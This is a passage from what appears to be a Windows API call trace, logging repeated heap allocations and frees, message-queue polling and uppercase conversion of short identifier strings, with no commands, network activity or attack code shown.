(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9f34) returned 0x24eb8d8 [0189.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0189.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.278] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0189.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.286] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.286] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.286] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.287] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.287] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.287] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.287] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.287] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.288] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.288] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.290] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.291] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.291] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.291] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.291] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.292] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.292] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.292] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.293] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.295] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.295] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.295] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.296] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.296] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: 